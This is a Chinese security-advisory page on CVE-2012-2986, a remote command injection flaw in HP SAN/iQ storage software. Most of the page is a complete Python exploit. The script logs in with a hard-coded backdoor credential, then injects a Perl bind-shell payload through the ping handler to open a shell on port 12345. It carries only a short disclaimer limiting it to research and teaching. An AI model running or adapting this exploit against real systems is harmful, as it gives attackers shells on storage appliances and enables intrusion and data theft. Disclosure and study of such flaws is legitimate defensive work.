发布日期:2012-08-17
更新日期:2012-08-23受影响系统:
HP SAN/iQ < 9.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 55133
CVE ID: CVE-2012-2986SAN是一种更加强大、可靠和可扩展的数据架构。HP Virtual SAN Appliance上HP SAN/iQ 9.5中的lhn/public/network/ping在实现上存在安全漏洞,可允许远程已验证用户通过第一、三、四个参数中的Shell元字符执行任意命令。<*来源:Tenable Network Security
链接:http://www.kb.cert.org/vuls/id/441363
http://www.exploit-db.com/exploits/18901/
http://www.exploit-db.com/exploits/18893/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python""" ==================================
Pseudo documentation
================================== """# HP VSA / SANiQ Hydra client
# Nicolas Gréire <nicolas.gregoire@agarri.fr>
# v0.5""" ==================================
Target information
================================== """HOST = "192.168.201.11" # The remote host
PORT = 13838 # The hydra port""" ==================================
Imports
================================== """import getopt
import re
import sys
import binascii
import struct
import socket
import os""" ==================================
Define functions
================================== """# Some nice formatting
def zprint(str):
print "[=] " + str# Define packets
def send_Exec():
zprint("Send Exec")
# RESTRICTIONS
# You can"t use "/" in the payload
# No Netcat/Ruby/PHP, but telnet/bash/perl are available # METASPLOIT PAYLOAD
cmd = "perl -MIO -e "$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,12345,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>"" # COMMAND INJECTION BUG
data = "get:/lhn/public/network/ping/127.0.0.1/foobar;" + cmd + "/" # EXPLOIT
zprint("Now connect to port 12345 of machine " + str(HOST))
send_packet(data)def send_Login():
zprint("Send Login")
data = "login:/global$agent/L0CAlu53R/Version "8.5.0"" # Backdoor
send_packet(data)# Define the sending function
def send_packet(message): # Add header
ukn1 = "x00x00x00x00x00x00x00x01"
ukn2 = "x00x00x00x00" + "x00x00x00x00x00x00x00x00" + "x00x00x00x14xffxffxffxff"
message = message + "x00"
data = ukn1 + struct.pack("!I", len(message)) + ukn2 + message # Send & receive
s.send(data)
data = s.recv(1024)
zprint("Received : [" + data + "]")""" ==================================
Main code
================================== """# Print bannner
zprint("HP Hydra client")
zprint("Attacking host " + HOST + " on port " + str(PORT))# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((HOST, PORT))# Attack !
send_Login()
send_Exec()# Deconnect
s.close# Exit
zprint("Exit")建议:
--------------------------------------------------------------------------------
厂商补丁:HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://itrc.hp.comGoogle Chrome OS 远程代码执行漏洞(CVE-2012-2864)Lattice Diamond Programmer缓冲区溢出漏洞相关资讯 SAN 远程命令注入漏洞 SAN漏洞
- Microsoft IIS FTP服务远程命令注 (11/14/2012 19:13:31)
- HP SAN/iQ远程命令注入漏洞 (08/23/2012 07:23:01)
- Cisco TelePresence Recording (07/13/2012 08:03:57)
| - cgit "syntax-highlighting.sh"远 (10/31/2012 08:37:35)
- Cisco Linksys WMB54G远程命令注入 (07/24/2012 08:28:26)
- Cisco TelePresence Immersive (07/13/2012 08:03:19)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|